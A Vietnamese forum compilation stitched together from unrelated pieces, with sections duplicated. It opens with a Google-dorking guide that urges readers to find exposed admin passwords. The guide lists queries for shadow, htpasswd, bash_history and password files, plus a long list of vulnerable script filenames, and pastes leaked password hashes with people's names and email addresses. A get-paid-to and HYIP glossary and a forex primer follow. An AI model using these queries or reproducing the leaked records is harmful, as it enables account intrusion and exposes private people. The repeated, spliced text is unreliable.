Cách đây vài ngày tôi có đọc trên một forum nói về cách có thể dùng Goggle.com để tìm các thông tin quan trọng mà không cần bẻ khóa một website nào hết.
Bạn biết đối Google.com khi "search" bạn có thể dùng một số từ khóa để tìm một số cụm từ của các website thường không muốn người khác vào.
Okay, Vậy chúng ta hảy bắt đầu nha.
Bạn vào website google.com và bắt đầu đánh dòng lệnh sau trên ô Search:
allintitle: "index of/root"
Sau đó bạn sẻ thấy khoảng 3120 sites có cụm từ này, bây giờ bạn có thể từng cái một kiểm tra xem có thông tin nào bạn cần không,
Thế nhưng có bạn không thích các thông tin này, nhưng lại thích tìm hiểu về password của admin các site, các bạn có thể đánh dòng lệnh sau:
inurl:"auth_user_file.txt"
Wow, bây giờ các bạn tha hồ mà nghiên cứu password & username, khi tôi đánh dòng lệnh này, website đầu tiên mà tôi bấm vào là Here và nó cho tôi data như sau:
$1$nr$90wmeMQIDw0HforiU2vUG1|admin|admin|Martin|Kl ässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Martin|norm al|Martin|Klässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Juergen|nor mal|Jürgen|Klässner|juergen-klaessner@online.de|on
$1$as$reDTTzzp8RaJUXVjXNksi0|Mauer_Harald|normal|H arald|Mauer|hmauer@germering.baynet.de|on
Cái này là cái gì vậy nè, phần này dành cho các cao thủ diển dịch nhen hihihi.
Nói chung với Google.com các bạn có thể dùng các chuổi sau đây, và chắc chắn các bạn sẻ không bao giờ chán khi lên net nửa đâu.
Chào các bạn,
Cách đây vài ngày tôi có đọc trên một forum nói về cách có thể dùng Goggle.com để tìm các thông tin quan trọng mà không cần bẻ khóa một website nào hết.
Bạn biết đối Google.com khi "search" bạn có thể dùng một số từ khóa để tìm một số cụm từ của các website thường không muốn người khác vào.
Okay, Vậy chúng ta hảy bắt đầu nha.
Bạn vào website google.com và bắt đầu đánh dòng lệnh sau trên ô Search:
allintitle: "index of/root"
Sau đó bạn sẻ thấy khoảng 3120 sites có cụm từ này, bây giờ bạn có thể từng cái một kiểm tra xem có thông tin nào bạn cần không,
Thế nhưng có bạn không thích các thông tin này, nhưng lại thích tìm hiểu về password của admin các site, các bạn có thể đánh dòng lệnh sau:
inurl:"auth_user_file.txt"
Wow, bây giờ các bạn tha hồ mà nghiên cứu password & username, khi tôi đánh dòng lệnh này, website đầu tiên mà tôi bấm vào là Here và nó cho tôi data như sau:
$1$nr$90wmeMQIDw0HforiU2vUG1|admin|admin|Martin|Kl ässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Martin|norm al|Martin|Klässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Juergen|nor mal|Jürgen|Klässner|juergen-klaessner@online.de|on
$1$as$reDTTzzp8RaJUXVjXNksi0|Mauer_Harald|normal|H arald|Mauer|hmauer@germering.baynet.de|on
Cái này là cái gì vậy nè, phần này dành cho các cao thủ diển dịch nhen hihihi.
Nói chung với Google.com các bạn có thể dùng các chuổi sau đây, và chắc chắn các bạn sẻ không bao giờ chán khi lên net nửa đâu.
"Index
of /admin"
|
"Index
of /password"
|
"Index
of /mail"
|
"Index
of /" +passwd
|
"Index
of /" +password.txt
|
"Index
of /" +.htaccess
|
index of ftp
+.mdb allinurl:/cgi-bin/ +mailto
|
administrators.pwd.index
|
authors.pwd.index
|
service.pwd.index
|
filetype:config
web
|
gobal.asax
index
|
allintitle:
"index of/admin"
|
allintitle:
"index of/root"
|
allintitle:
sensitive filetype:doc
|
allintitle:
restricted filetype :mail
|
allintitle:
restricted filetype:doc site:gov
|
inurl asswd
filetype:txt
|
inurl:admin
filetype:db
|
inurl:iisadmin
|
inurl:"auth_user_file.txt"
|
inurl:"wwwroot/*."
|
top secret site:mil
confidential site:mil
confidential site:mil
allinurl:
winnt/system32/ (get cmd.exe)
|
allinurl:/bash_history
|
intitle:"Index
of" .sh_history
|
intitle:"Index
of" .bash_history
|
intitle:"index
of" passwd
|
intitle:"index
of" people.lst
|
intitle:"index
of" pwd.db
|
intitle:"index
of" etc/shadow
|
intitle:"index
of" spwd
|
intitle:"index
of" master.passwd
|
intitle:"index
of" htpasswd
|
intitle:"index
of" members OR accounts
|
intitle:"index
of" user_carts OR user_cart
|
ALTERNATIVE INPUTS
_vti_inf.html
|
service.pwd
|
users.pwd
|
authors.pwd
|
administrators.pwd
|
shtml.dll
|
shtml.exe
|
fpcount.exe
|
default.asp
|
showcode.asp
|
sendmail.cfm
|
getFile.cfm
|
imagemap.exe
|
test.bat
|
msadcs.dll
|
htimage.exe
|
counter.exe
|
browser.inc
|
hello.bat
|
default.asp\
|
dvwssr.dll
|
cart32.exe
|
add.exe
|
index.jsp
|
SessionServlet
|
shtml.dll
|
index.cfm
|
page.cfm
|
shtml.exe
|
web_store.cgi
|
shop.cgi
|
upload.asp
|
default.asp
|
pbserver.dll
|
phf
|
test-cgi
|
finger
|
Count.cgi
|
jj
|
php.cgi
|
php
|
nph-test-cgi
|
handler
|
webdist.cgi
|
webgais
|
websendmail
|
faxsurvey
|
htmlscript
|
perl.exe
|
wwwboard.pl
|
www-sql
|
view-source
|
campas
|
aglimpse
|
glimpse
|
man.sh
|
AT-admin.cgi
|
AT-generate.cgi
|
filemail.pl
|
maillist.pl
|
info2www
|
files.pl
|
bnbform.cgi
|
survey.cgi
|
classifieds.cgi
|
wrap
|
cgiwrap
|
edit.pl
|
perl
|
names.nsf
|
webgais
|
dumpenv.pl
|
test.cgi
|
submit.cgi
|
guestbook.cgi
|
guestbook.pl
|
cachemgr.cgi
|
responder.cgi
|
perlshop.cgi
|
query
|
w3-msql
|
plusmail
|
htsearch
|
infosrch.cgi
|
publisher
|
ultraboard.cgi
|
db.cgi
|
formmail.cgi
|
allmanage.pl
|
ssi
|
adpassword.txt
|
redirect.cgi
|
cvsweb.cgi
|
login.jsp
|
dbconnect.inc
|
admin
|
htgrep
|
wais.pl
|
amadmin.pl
|
subscribe.pl
|
news.cgi
|
auctionweaver.pl
|
.htpasswd
|
acid_main.php
|
access.log
|
log.htm
|
log.html
|
log.txt
|
logfile
|
logfile.htm
|
logfile.html
|
logfile.txt
|
logger.html
|
stat.htm
|
stats.htm
|
stats.html
|
stats.txt
|
webaccess.htm
|
wwwstats.html
|
source.asp
|
perl
|
mailto.cgi
|
YaBB.pl
|
mailform.pl
|
cached_feed.cgi
|
global.cgi
|
Search.pl
|
build.cgi
|
common.php
|
show
|
global.inc
|
ad.cgi
|
WSFTP.LOG
|
index.html
|
index.html.bak
|
print.cgi
|
register.cgi
|
webdriver
|
bbs_forum.cgi
|
mysql.class
|
sendmail.inc
|
CrazyWWWBoard.cgi
|
search.pl
|
way-board.cgi
|
webpage.cgi
|
pwd.dat
|
adcycle
|
post-query
|
help.cgi
|
Những điều cơ bản trong GPT world
I.Những khái niệm cơ bản :
CPC : viết tắt của Cost per click , giá của 1 click vào những listing , keyword , banner , hay quảng cáo mà bạn sẽ được trả mỗi khi có người chọn ( click) vào .
CPM : Viết tắt của Cost per 1000 Impression ( M dựa theo ký hiệu của số Latinh , M = 1000),CPM chính là thước đo thường dùng trong internet marketing
Country Tiers (Các dãy quốc gia)
Sự phân loại hay xếp hạng (luôn thay đổi) của các quốc gia thường được được dùng để tính xem giá trị thực của các hits nhận được từ mỗi quốc gia
Ví dụ : Các tier country đầu tiên là : US và UK
E-currency Exchanger
Một cá nhân hoặc một nhóm người thường xuyên tham gia giao dịch bao gồm sự trao đổi từ 1 loại tiền tệ này sang dạng khác tương đương dựa theo thị trường hoặc là tỉ giá được qui định
Vd : TheGoldShop.biz
Theo : TalkGold Forum , GoldPages.net
Valid hits
Hits mà thể hiện được tất cả thông tin cho người xem.Nó loại trừ việc xem lại trang 1 lần nữa , thông báo sai và máy tính tự tạo ra hits
Valid Search
Việc tham gia search những keyword có liên quan trên net và click vào những URL của những kết quả tìm kiếm đó.Tính hiệu lực còn phụ thuộc vào điều kiện được đặt ra bởi các Search Engines
2.Những hệ thống thanh toán trực tuyến :
Payment Processor, also Transaction Processor
Theo định nghĩa của www. vpsource.com/glossary.html, “là một cơ quan tài chính riêng biệt của nhà bank , có nhiệm vụ xử lý dữ liệu từ những giao dịch thông qua credit card.Nó có nhiệm vụ phân phối tiền giữa khách hàng và các tổ chức thương mại”
E-gold.com
Theo định nghĩa của E-gold.com , “ e-gold là 1 loại tiền tệ điện tử (đưa ra bởi e-gold Ltd , tập đoàn Nevis) qui đổi 100% thành vàng ở trong tài khoản.Các tài khoản e-gold được kết hợp với 1 tài khoản hệ thống có thể cho phép các tài khoản gửi 1 lượng vàng xđ tới các tài khoản khác.”
Ebullion
Theo định nghĩa của E-bullion.com , “ e-bullion là một loại tiền tệ điện tử quốc tế , được qui đổi qua các kim loại quý “Giống như e-gold, các chủ tài khoản có thể gửi hoặc nhận tiền ngay lập tức qua internet với một lệ phí nhỏ.
Intgold
Theo IntGold.com , “IntGold (Internet Gold Inc.) là 1 hệ thống thanh toán trực tuyến các loại tiền tệ số ( digital currency).IntGold sở hữu hệ thống InGoldcard ATM debit card”.
Moneybookers
Là một bộ máy thanh toán , đòi hỏi phải có địa chỉ email để trao đổi tiền trực tuyến
Những nước có hệ thống thanh toán: Andorra, Australia, Austria, Belgium, Bulgaria, Czech Republic, Denmark, Estonia, France, Greece, Hungary, Ireland, Italy, Netherlands, Norway, Poland, Slovakia, Spain, Sweden, Switzerland, UK
Những nước được rút tiền thông qua cheque : India, Ireland, US, UK
Những nước hiện nay chưa được phép sử dụng : Myanmar, Nauru, Nigeria
Paypal
Là một bộ máy thanh toán , đòi hỏi phải có địa chỉ email để trao đổi tiền trực tuyến
Những quốc gia có site của Paypal(bằng tiếng bản ngữ) : Australia, Austria, Belgium, Canada, France, Germany, Italy, Netherlands, Spain, Switzerland, United Kingdom, United States
Những nước có hệ thống thanh toán : Denmark, Finland, Greece, Hong Kong, Ireland, Japan, Mexico, New Zealand, Norway, , Portugal, Singapore, South Korea, Sweden, Taiwan
Những nước được rút tiền thông qua cheque: Argentina, Brazil, Chile, China, Ecuador, India, Jamaica, Uruguay
Những nước chỉ được chuyển tiền vào các tài khoán ở Mỹ : Costa Rica, Dominican Republic, Iceland, Israel, Luxembourg, Malaysia, Thailand, Turkey, Venezuela
Những nước chỉ được gửi tiền sang các tài khoản paypal khác : Anguilla, Cyprus, Czech Republic, Estonia, Hungary, Latvia, Lithuania, Malta, Poland, Slovakia, lovenia, South Africa
Resources: Paypal.com, PaypalSucks.com
StormPay
Là một bộ máy thanh toán , đòi hỏi phải có địa chỉ email để trao đổi tiền trực tuyến. Tiền có thể được rút qua các đường dây nhà băng hoặc cheque.
Những nước hiện nay chưa được phép sử dụng: Afghanistan, Cuba, Indonesia,Vietnam , Iran, Iraq, Libya, Nigeria, Niger, North Korea, Syria
III. Các chương trình Getpaid thông dụng (các newbie nên tham gia)
1.PTR
paid to read , nơi mà việc bạn lựa chọn đối với các thư quảng cáo , như là đọc chúng , thì bạn sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác
Vd: 5starpromotions
Resources: Getpaiddatabase.com
2.PTS
paid to surf, nơi mà việc surf các site trong chương trình của họ sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác.
Vd : Studio Traffic
Resources: GetPaidDatabase.com
3.Autosuft
Tương tự PTS là Autosurf
Những chương trình đòi hỏi thành viên phải xem 1 số lượng site nhất định và sẽ được tự động tính thành các traffic credits ( dùng để quảng cáo cho site của bạn ) hay các cash bonuses.
Vd : 4daily
4.PTSU
paid to sign up,nơi mà việc đăng ký dưới các chương trình xđ sử dụng các link có sẵn , sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác , sau khi chương trình nhận được sự xác nhận của bạn
Vd : Leapcash
5.PTC
Viết tắt của paid to click , nơi mà việc click vào các link sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác.
Vd : NoBannerZone
Resources: GetPaidDatabase.com
6.PTP
Viết tắt của paid to promote,nơi mà việc quảng cáo (promoting) các chương trình ,sử dụng referral link của bạn sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác.Những phần thưởng thường được tính dựa trên số credits bạn kiếm được , nó còn phụ thuộc vào số valid(hợp lệ) mà referral page của bạn nhận được , và còn phụ thuộc vào cả chất lượng của traffic * vd các tier countries đầu tiên (US hay UK) thì 1 valid hit = 1 credit , 2nd tier country : 1 valid hit = 0.5 credit , vv…)
Vd: Paid-to-promote.com
6’Traffic Exchange (ko kiếm được tiền)
Chương trình mà ở đó các thành viên tham gia xem các website để trao đổi credits.Sau đó sẽ đăng ký số lượng hits cho website của mình . ( Thường dùng để chơi PTP )
7.PPC
Viết tắt của pay per click , nơi mà người quảng cáo được trả tiền công cho mỗi 1 click (unique click) vào các quảng cáo của họ nhận được.
Vd : Search Engine
IV.Những chương trình khác
1.Doubler
Khái niệm dùng để nhắc tới những chương trình đầu tư mà hứa sẽ làm gấp đôi số tiền đầu tư sau 1 khoảng thời gian nhất định
Vd : MyCashDoubler
2.HYIP
Viết tắt của High Yield Investment Programs ; thường được dùng để nhắc tới các công ty trực tuyến mà hứa sẽ trả 1 lượng % tiền đầu tư nhất định.Lãi suất đến từ những dự án market trading của các owner , mà ko thể được bảo đảm .Nói cách khác , bạn đầu tư tiền của bạn , kiếm được 1 khoản với tỉ lệ lãi suất nhất định của họ,và rút tiền cùng với (hoặc ko) số tiền đầu tư của bạn sau 1 thời gian qui định
Vd : HYIPMax
Theo : TalkGold Forum
3.Matrix
Nói 1 cách gần đúng , Matrix là 1 tổ chức có cấu trúc , nó giới hạn sự phát triển theo chiều ngang của thành viên và tăng cường sự phát triển theo chiều thẳng đứng của chương trình . Nó bắt buộc 1 số giới hạn các downlines trực tiếp của những người tuyển mộ giỏi (kiếm downline giỏi) có thể có , vì vậy sẽ làm tăng cơ hội mà những newcomers sẽ được đặt ở dưới những downline của những người tuyển mộ giỏi này.
4.MLM
Viết tắt của Multi-Level Marketing , là 1 hệ thống bán hàng hoặc các dịch vụ thông qua mạng lưới của người phân phối.
Vd : Avon ; SFI
5.Paid to Play
Nơi mà việc tham gia các trò chơi sẽ kiếm được credit , và credit có thể kiếm được giải thưởng hoặc tiền
Vd. Prizee, SkillJam, Kerclinks
V.Những chương trình không nên tham gia:
1.Ponzi
Theo định nghĩa của Wikipedia, “Hệ thống Ponzi là 1 hệ thống đầu tư lừa đảo bao gồm trả tiền cho các investor đến trước bằng tiền của các investor đến sau , xa hơn là dùng lãi suất thu được từ các công ty thương mại uy tín .Hệ thống Ponzi thường đưa ra những kế hoạch ngắn hạn với lãi suất cao để dụ dỗ , lôi kéo các investor mới , lấy tiền của họ để trả cho các investor cũ, và tiếp tục cò mồi các nạn nhân của nó vào các rủi ro còn lớn hơn.
2.Pyramid Scheme
Theo đ/n của Answers.com , “Một hệ thống lừa đảo , mà ở đó mọi người là những lính mới để trả tiền cho những người khác trên mình về cấp bậc , và sau đó thì mong đợi nhận được tiền từ những lính mới khác dưới họ.Cuối cùng là số lượng các lính mới dùng để duy trì cấu trúc thanh toán ngày càng ít, và hệ thống sụp đổ . Hầu hết mọi người mất số tiền mà họ đã trả !!!”
3.Randomizer
Những chương trình mà thưởng ngẫu nhiên cho các thành viên cũ từ các lệ phí của những thành viên mới .Thông thường 1 lần lệ phí thường được chia nhỏ cho admin , người giới thiệu và 1 thành viên được chọn ngẫu nhiên.Thành công của nó phụ thuộc vào sự tham gia liên tục của các thành viên mới
Vd: Dollar Buddy
I.Những khái niệm cơ bản :
CPC : viết tắt của Cost per click , giá của 1 click vào những listing , keyword , banner , hay quảng cáo mà bạn sẽ được trả mỗi khi có người chọn ( click) vào .
CPM : Viết tắt của Cost per 1000 Impression ( M dựa theo ký hiệu của số Latinh , M = 1000),CPM chính là thước đo thường dùng trong internet marketing
Country Tiers (Các dãy quốc gia)
Sự phân loại hay xếp hạng (luôn thay đổi) của các quốc gia thường được được dùng để tính xem giá trị thực của các hits nhận được từ mỗi quốc gia
Ví dụ : Các tier country đầu tiên là : US và UK
E-currency Exchanger
Một cá nhân hoặc một nhóm người thường xuyên tham gia giao dịch bao gồm sự trao đổi từ 1 loại tiền tệ này sang dạng khác tương đương dựa theo thị trường hoặc là tỉ giá được qui định
Vd : TheGoldShop.biz
Theo : TalkGold Forum , GoldPages.net
Valid hits
Hits mà thể hiện được tất cả thông tin cho người xem.Nó loại trừ việc xem lại trang 1 lần nữa , thông báo sai và máy tính tự tạo ra hits
Valid Search
Việc tham gia search những keyword có liên quan trên net và click vào những URL của những kết quả tìm kiếm đó.Tính hiệu lực còn phụ thuộc vào điều kiện được đặt ra bởi các Search Engines
2.Những hệ thống thanh toán trực tuyến :
Payment Processor, also Transaction Processor
Theo định nghĩa của www. vpsource.com/glossary.html, “là một cơ quan tài chính riêng biệt của nhà bank , có nhiệm vụ xử lý dữ liệu từ những giao dịch thông qua credit card.Nó có nhiệm vụ phân phối tiền giữa khách hàng và các tổ chức thương mại”
E-gold.com
Theo định nghĩa của E-gold.com , “ e-gold là 1 loại tiền tệ điện tử (đưa ra bởi e-gold Ltd , tập đoàn Nevis) qui đổi 100% thành vàng ở trong tài khoản.Các tài khoản e-gold được kết hợp với 1 tài khoản hệ thống có thể cho phép các tài khoản gửi 1 lượng vàng xđ tới các tài khoản khác.”
Ebullion
Theo định nghĩa của E-bullion.com , “ e-bullion là một loại tiền tệ điện tử quốc tế , được qui đổi qua các kim loại quý “Giống như e-gold, các chủ tài khoản có thể gửi hoặc nhận tiền ngay lập tức qua internet với một lệ phí nhỏ.
Intgold
Theo IntGold.com , “IntGold (Internet Gold Inc.) là 1 hệ thống thanh toán trực tuyến các loại tiền tệ số ( digital currency).IntGold sở hữu hệ thống InGoldcard ATM debit card”.
Moneybookers
Là một bộ máy thanh toán , đòi hỏi phải có địa chỉ email để trao đổi tiền trực tuyến
Những nước có hệ thống thanh toán: Andorra, Australia, Austria, Belgium, Bulgaria, Czech Republic, Denmark, Estonia, France, Greece, Hungary, Ireland, Italy, Netherlands, Norway, Poland, Slovakia, Spain, Sweden, Switzerland, UK
Những nước được rút tiền thông qua cheque : India, Ireland, US, UK
Những nước hiện nay chưa được phép sử dụng : Myanmar, Nauru, Nigeria
Paypal
Là một bộ máy thanh toán , đòi hỏi phải có địa chỉ email để trao đổi tiền trực tuyến
Những quốc gia có site của Paypal(bằng tiếng bản ngữ) : Australia, Austria, Belgium, Canada, France, Germany, Italy, Netherlands, Spain, Switzerland, United Kingdom, United States
Những nước có hệ thống thanh toán : Denmark, Finland, Greece, Hong Kong, Ireland, Japan, Mexico, New Zealand, Norway, , Portugal, Singapore, South Korea, Sweden, Taiwan
Những nước được rút tiền thông qua cheque: Argentina, Brazil, Chile, China, Ecuador, India, Jamaica, Uruguay
Những nước chỉ được chuyển tiền vào các tài khoán ở Mỹ : Costa Rica, Dominican Republic, Iceland, Israel, Luxembourg, Malaysia, Thailand, Turkey, Venezuela
Những nước chỉ được gửi tiền sang các tài khoản paypal khác : Anguilla, Cyprus, Czech Republic, Estonia, Hungary, Latvia, Lithuania, Malta, Poland, Slovakia, lovenia, South Africa
Resources: Paypal.com, PaypalSucks.com
StormPay
Là một bộ máy thanh toán , đòi hỏi phải có địa chỉ email để trao đổi tiền trực tuyến. Tiền có thể được rút qua các đường dây nhà băng hoặc cheque.
Những nước hiện nay chưa được phép sử dụng: Afghanistan, Cuba, Indonesia,Vietnam , Iran, Iraq, Libya, Nigeria, Niger, North Korea, Syria
III. Các chương trình Getpaid thông dụng (các newbie nên tham gia)
1.PTR
paid to read , nơi mà việc bạn lựa chọn đối với các thư quảng cáo , như là đọc chúng , thì bạn sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác
Vd: 5starpromotions
Resources: Getpaiddatabase.com
2.PTS
paid to surf, nơi mà việc surf các site trong chương trình của họ sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác.
Vd : Studio Traffic
Resources: GetPaidDatabase.com
3.Autosuft
Tương tự PTS là Autosurf
Những chương trình đòi hỏi thành viên phải xem 1 số lượng site nhất định và sẽ được tự động tính thành các traffic credits ( dùng để quảng cáo cho site của bạn ) hay các cash bonuses.
Vd : 4daily
4.PTSU
paid to sign up,nơi mà việc đăng ký dưới các chương trình xđ sử dụng các link có sẵn , sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác , sau khi chương trình nhận được sự xác nhận của bạn
Vd : Leapcash
5.PTC
Viết tắt của paid to click , nơi mà việc click vào các link sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác.
Vd : NoBannerZone
Resources: GetPaidDatabase.com
6.PTP
Viết tắt của paid to promote,nơi mà việc quảng cáo (promoting) các chương trình ,sử dụng referral link của bạn sẽ được credited vào acc của bạn với những phần thưởng tương ứng, tiền hay là các thứ khác.Những phần thưởng thường được tính dựa trên số credits bạn kiếm được , nó còn phụ thuộc vào số valid(hợp lệ) mà referral page của bạn nhận được , và còn phụ thuộc vào cả chất lượng của traffic * vd các tier countries đầu tiên (US hay UK) thì 1 valid hit = 1 credit , 2nd tier country : 1 valid hit = 0.5 credit , vv…)
Vd: Paid-to-promote.com
6’Traffic Exchange (ko kiếm được tiền)
Chương trình mà ở đó các thành viên tham gia xem các website để trao đổi credits.Sau đó sẽ đăng ký số lượng hits cho website của mình . ( Thường dùng để chơi PTP )
7.PPC
Viết tắt của pay per click , nơi mà người quảng cáo được trả tiền công cho mỗi 1 click (unique click) vào các quảng cáo của họ nhận được.
Vd : Search Engine
IV.Những chương trình khác
1.Doubler
Khái niệm dùng để nhắc tới những chương trình đầu tư mà hứa sẽ làm gấp đôi số tiền đầu tư sau 1 khoảng thời gian nhất định
Vd : MyCashDoubler
2.HYIP
Viết tắt của High Yield Investment Programs ; thường được dùng để nhắc tới các công ty trực tuyến mà hứa sẽ trả 1 lượng % tiền đầu tư nhất định.Lãi suất đến từ những dự án market trading của các owner , mà ko thể được bảo đảm .Nói cách khác , bạn đầu tư tiền của bạn , kiếm được 1 khoản với tỉ lệ lãi suất nhất định của họ,và rút tiền cùng với (hoặc ko) số tiền đầu tư của bạn sau 1 thời gian qui định
Vd : HYIPMax
Theo : TalkGold Forum
3.Matrix
Nói 1 cách gần đúng , Matrix là 1 tổ chức có cấu trúc , nó giới hạn sự phát triển theo chiều ngang của thành viên và tăng cường sự phát triển theo chiều thẳng đứng của chương trình . Nó bắt buộc 1 số giới hạn các downlines trực tiếp của những người tuyển mộ giỏi (kiếm downline giỏi) có thể có , vì vậy sẽ làm tăng cơ hội mà những newcomers sẽ được đặt ở dưới những downline của những người tuyển mộ giỏi này.
4.MLM
Viết tắt của Multi-Level Marketing , là 1 hệ thống bán hàng hoặc các dịch vụ thông qua mạng lưới của người phân phối.
Vd : Avon ; SFI
5.Paid to Play
Nơi mà việc tham gia các trò chơi sẽ kiếm được credit , và credit có thể kiếm được giải thưởng hoặc tiền
Vd. Prizee, SkillJam, Kerclinks
V.Những chương trình không nên tham gia:
1.Ponzi
Theo định nghĩa của Wikipedia, “Hệ thống Ponzi là 1 hệ thống đầu tư lừa đảo bao gồm trả tiền cho các investor đến trước bằng tiền của các investor đến sau , xa hơn là dùng lãi suất thu được từ các công ty thương mại uy tín .Hệ thống Ponzi thường đưa ra những kế hoạch ngắn hạn với lãi suất cao để dụ dỗ , lôi kéo các investor mới , lấy tiền của họ để trả cho các investor cũ, và tiếp tục cò mồi các nạn nhân của nó vào các rủi ro còn lớn hơn.
2.Pyramid Scheme
Theo đ/n của Answers.com , “Một hệ thống lừa đảo , mà ở đó mọi người là những lính mới để trả tiền cho những người khác trên mình về cấp bậc , và sau đó thì mong đợi nhận được tiền từ những lính mới khác dưới họ.Cuối cùng là số lượng các lính mới dùng để duy trì cấu trúc thanh toán ngày càng ít, và hệ thống sụp đổ . Hầu hết mọi người mất số tiền mà họ đã trả !!!”
3.Randomizer
Những chương trình mà thưởng ngẫu nhiên cho các thành viên cũ từ các lệ phí của những thành viên mới .Thông thường 1 lần lệ phí thường được chia nhỏ cho admin , người giới thiệu và 1 thành viên được chọn ngẫu nhiên.Thành công của nó phụ thuộc vào sự tham gia liên tục của các thành viên mới
Vd: Dollar Buddy
Bản chất Forex Trading !
Nhiều người khi mới làm quen với Forex, cứ nghĩ là đơn giản mà thưc chất không hề biết đến bản chất thực sự của nó, zậy bản chất của Forex là gì ? Yeah !
Trước nhất chúng ta cần phải hiểu chúng ta là ai ở sân chơi Forex, lấy vì dụ khi bạn thấy tỉ giá sau :
* EUR / USD = 1,2547 điều này có nghĩa là gì ? và con số này do đâu mà có ?
Câu trả lời là tỉ giá chênh lệch giữa 2 loại tiền tệ : đồng Euro và USD là 1,2547 (có nghĩa 1 đồng Euro có thể mua được 1,2547 đồng USD ! OK ! ) Và con số này là do giá trị của từng loại tiền tệ ở từng thời điểm khác nhau mà một quốc gia hay một khối liên minh nào đó như EU chẳng hạn phát triển như thế nào so với các quốc gia khác sẽ tạo ra tỉ giá đó ( và ở đây tui ko đi chuyên sâu vào lĩnh vưc tiền tệ và nếu như các bạn thật sự muốn biết tui có thể trả lời cho bạn )
* Lấy ví dụ ở trên : EUR / USD = 1,2547 cái tỉ giá này có thể tăng mà cũng có thể giảm ở nhiều trường hợp :
Khi Euro hạ xuống mà USD ko đổi tỉ giá này sẽ giảm xuống và khi Euro tăng mà USD ko đổi thì tỉ giá này tăng lên
Khi USD hạ xuống mà EUR ko đổi tỉ giá này sẽ tăng lên và khi USD tăng mà EUR ko đổi thì tỉ giá này tăng lên
Nhưng thưc tế cũng có thể cả hai cùng tăng hoặc cùng giảm và một trường hợp khác là một cái tăng một cái giảm
Và tùy trường hợp mà nó sẽ tăng giảm với mức độ dao động như thế nào !
Và cái tỉ số này sẽ tăng hay giảm là do mức độ đầu tư của tất cả mọi người trên thế giới vào một loại tiền tệ nào đó và được các hệ thống ngân hàng trên khắp thế giới tính toán chi tiết một cách liên tục. Ví dụ khi đồng USD hạ giá và người ta biết rằng nó sẽ tăng trở lại do theo dõi tin tức tức và tình hình biến động của thế giới, zậy còn chờ gì nữa mà mà ko mua USD để trữ khi giá thấp và chờ khi giá tăng lên bán ra họ sẽ có lời, đúng không ? hìi
Nhưng họ là ai, họ là người đã tạo ra con số tỉ giá đó đó thưa các bạn, và tùy sở thích của bạn mà bạn sẽ chọn cho mình là ai !
Nhưng cái chính ở đây tui không muốn nói đến những người " chơi bên trong " yeah là " chơi bên trong " ! hìi ... mà tui chỉ muốn nói đến với các bạn đó là " Trader ", nếu bạn thực sự muốn làm " Trader " vâng bạn sẽ là người " chơi vòng ngoài ".
OK ! Tới đây bạn đã hiểu hết vấn đề chưa ? Nếu như bạn đã rõ rùi thì ..... hãy quên hết đi ! Và tại sao như zậy ? câu hỏi đó sẽ do bạn tự trả lời.......hii` !!!
" FOREX là một nghệ thuật và TRADER cũng là một nghệ sĩ !!! "
And now , Forex Trader bắt đầu ..................
Đầu tiên chúng ta cần biết cái quan trọng nhất ở Forex là gì ? Đó là " Quantity " ( kể từ đây khái niệm này sẽ được hĩu là "quan" OK )
Đó là một loại đơn vị để tính toán tiền lãi hay lỗ ở Forex của Trader, hic....tui ko bit nên gọi là cái gì nữa đây, thui kệ tạm gọi là "cổ phần" cho dễ hĩu đi hén .......hehehe
Và 1$ sẽ mua được 100quan ở Marketiva
Lấy lại tỉ số này EUR / USD = 1,2547 nếu sau khi được tính toán con số này tăng lên là 1,2548
Nghĩa là đã tăng lên bi nhiu ? đố bạn ! Nói chơi thui...hehehe : 1,2548 - 1,2547 = 0,0001 đúng nè ? yeah
Nếu bạn dùng 100$ mua 10.000quan (10k) thì số tiền của bạn tăng lên là : 10k * 0,0001 = 1$ ( wow ! sướng chưa ! ) Nhưng đâu có đơn giản zậy ! Vì đâu có ai ngồi không mà " khờ dại " dâng tặng cho bạn 1$ khi thị truòng lên, đúng nè ? cứ mỗi thằng 1 xèng (1$) thì sẽ cần bi nhiu mới đủ cho cái lũ trader " ốm o già nua " kia !
Tui nhớ cách đây 3 ngày khi bắt đầu khi tìm hĩu về Forex, có đọc qua một bài viết nào đó và có một ai đó hỏi rằng " Zậy thì lấy tiền đâu Marketiva trả cho mình ? "... hic....... Bạn nghĩ rằng nó cần lấy tiền của nó trả cho mình sao ????? Một câu trả lời cho bạn biết là " nó sẽ ko bõ một xu tiền túi nào của nó để trả cho bạn hết !!! " Why ????????
Tiếp theo tui sẽ đưa ra cho bạn một khái niệm gọi là " Spread " : theo nghĩa dịch của Oxford Dictionary thì được hĩu là " khỏang rộng trãi ra "... huhuhu là cái "giống" gì đây ? hehe...
Để hĩu " Spread ", chúng ta cần biết đến hai khái niệm trong kỹ thuật đấu giá nữa là " Bid " và " Offer "
* Bid : là đặt giá (khởi đầu kêu giá xuống)
* Offer : là trả ( và với Forex được hĩu là trả thêm ) giá (khởi đầu kêu giá lên)
Ví dụ khi ta thấy tỉ giá của EUR / USD = 1,2547 Và Bid của nó là 1,2544, Offer là 1,2547
Và Spread = Offer - Bid , trường hợp nay` la` 1,2547 - 1,2544 = 0,0003, tức là 2 cái giá này đã hơn kém nhau 3 đơn vị và 1 Spread ở đây là 3.
